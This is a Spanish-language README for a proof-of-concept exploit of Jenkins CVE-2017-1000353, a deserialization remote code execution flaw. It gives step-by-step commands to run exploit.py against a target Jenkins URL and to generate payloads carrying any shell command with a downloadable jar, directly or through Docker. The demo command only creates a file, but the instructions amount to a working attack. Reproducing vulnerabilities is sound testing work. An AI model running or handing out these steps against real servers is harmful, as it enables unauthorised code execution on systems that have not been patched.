
jenkins CVE-2017-1000353 POC
¿Cómo reproducir el CVE-2017-1000353 de Jenkins?
Clona este repositorio, usa el payload preconstruido jenkins_poc.ser con el siguiente comando:
python exploit.py http://your-ip:8080 jenkins_poc.ser
Entonces se ejecutará touch /tmp/success.
Importante: La generación del payload depende de la versión de Java. Se ha probado exitosamente con openjdk:8u292. Otras versiones de Java pueden no funcionar correctamente para la generación y explotación del payload.
jenkins_poc.ser?Descarga CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Si usas Docker, puedes usar el siguiente comando para asegurar la compatibilidad:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"